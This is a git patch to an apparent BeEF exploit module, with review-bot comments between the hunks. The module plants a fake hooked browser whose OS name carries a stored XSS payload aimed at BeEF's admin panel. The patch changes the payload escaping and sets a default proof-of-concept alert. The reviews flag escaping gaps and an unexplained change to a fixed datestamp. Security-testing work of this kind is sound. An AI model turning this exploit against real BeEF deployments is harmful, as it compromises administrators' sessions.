From 64098917246f4592da3b93bc0719ec85a5135966 Mon Sep 17 00:00:00 2001 From: zinduolis Date: Wed, 21 Jan 2026 15:32:44 +1000 Subject: [PATCH] eliminate escaping issues --- modules/exploits/beef_admin_panel_xss/command.js | 9 +++++---- modules/exploits/beef_admin_panel_xss/config.yaml | 2 +- modules/exploits/beef_admin_panel_xss/module.rb | 2 +- 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/exploits/beef_admin_panel_xss/command.js b/modules/exploits/beef_admin_panel_xss/command.js index 10318f560..57bb478cd 100644 --- a/modules/exploits/beef_admin_panel_xss/command.js +++ b/modules/exploits/beef_admin_panel_xss/command.js @@ -6,8 +6,8 @@ beef.execute(function() { - var target_beef_url = "<%= @target_beef_url %>"; - var xss_payload = "<%= @xss_payload %>"; + var target_beef_url = "<%= @target_beef_url.to_s.gsub('"', '\\"') %>"; + var xss_payload = "<%= @xss_payload.to_s.gsub('\\', '\\\\\\\\').gsub('"', '\\"').gsub("'", "\\\\'") %>"; // Generate a random session ID (80 characters, uppercase + digits) function generateHookId() { @@ -41,7 +41,8 @@ beef.execute(function() { var HOOK = generateHookId(); // Build the malicious payload - XSS is injected into host.os.name - var malicious_os_name = 'Linux'; + // Note: the payload is wrapped in the img onerror handler + var malicious_os_name = "Linux"; var browser_data = [{ "cid": 0, @@ -62,7 +63,7 @@ beef.execute(function() { "browser.window.referrer": "http://exploited-host:8000/victim.html", "browser.window.size.width": 1678, "browser.window.size.height": 168, - "browser.date.datestamp": new Date().toString(), + "browser.date.datestamp": "Fri Jan 16 2026 23:34:24 GMT+1000 (Australian Eastern Standard Time)", "host.os.name": malicious_os_name, "host.os.family": "Linux", "host.os.arch": 64, diff --git a/modules/exploits/beef_admin_panel_xss/config.yaml b/modules/exploits/beef_admin_panel_xss/config.yaml index ecdd537e8..2b2baaad5 100644 --- a/modules/exploits/beef_admin_panel_xss/config.yaml 
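Review bot: In the first command.js hunk the two templated assignments use different hand-written `gsub` chains, and `target_beef_url` escapes only `"`, so a backslash or line break in that option still yields a broken JavaScript string literal. `xss_payload` has the same gap for line breaks, and its `\'` escape has no effect on a double-quoted literal. Both values land in a JavaScript string context, so one JSON serialisation would cover every character the same way, e.g. `var target_beef_url = <%= @target_beef_url.to_s.to_json %>;` with no surrounding quotes (this assumes the json library is loaded where the template is rendered, which the page does not show). The body of `beef.execute` continues outside the hunk.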
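Review bot: In the third command.js hunk, `"browser.date.datestamp"` changes from `new Date().toString()` to a fixed string, which is unrelated to the escaping fix named in the subject and is not explained anywhere in the commit. Every run will now report the same past date, and the literal commits the author's local time zone to the repository. If the constant is deliberate, record why in a comment such as `// fixed datestamp: <reason>`; otherwise keep `new Date().toString()` and move this change to its own commit.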
+++ b/modules/exploits/beef_admin_panel_xss/config.yaml @@ -10,6 +10,6 @@ beef: category: "Exploits" name: "BeEF Admin Panel XSS" description: "This module exploits a Stored XSS vulnerability in the BeEF Admin Panel's Hooked Browsers tooltip. It registers a fake hooked browser with a malicious OS name containing JavaScript payload. When the BeEF administrator hovers over the fake browser entry, the XSS payload executes.

This can be used to test if a target BeEF instance is running a vulnerable version." - authors: ["radsec"] + authors: ["author"] target: working: ["ALL"] diff --git a/modules/exploits/beef_admin_panel_xss/module.rb b/modules/exploits/beef_admin_panel_xss/module.rb index c5753dc76..f44675c17 100644 --- a/modules/exploits/beef_admin_panel_xss/module.rb +++ b/modules/exploits/beef_admin_panel_xss/module.rb @@ -7,7 +7,7 @@ class Beef_admin_panel_xss < BeEF::Core::Command def self.options [ { 'name' => 'target_beef_url', 'ui_label' => 'Target BeEF URL', 'value' => 'http://localhost:3000', 'width' => '300px' }, - { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert('BeEF XSS - Vulnerable!')", 'width' => '400px' } + { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert(String.fromCharCode(88,83,83))", 'width' => '400px' } ] end
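Review bot: The new default for `xss_payload` in `self.options` no longer says what it is: `String.fromCharCode(88,83,83)` spells "XSS", whereas the old text told the administrator who sees the dialog that it came from a BeEF vulnerability check. Replacing a quoted default with a quote-free one also suggests, though the page does not confirm it, that quoted values still do not pass cleanly through the escaping added in command.js. At minimum add a comment above the entry, e.g. `# default is quote-free; 88,83,83 is "XSS"`, and state in the commit message whether quoted payloads were checked. The class body continues outside the hunk.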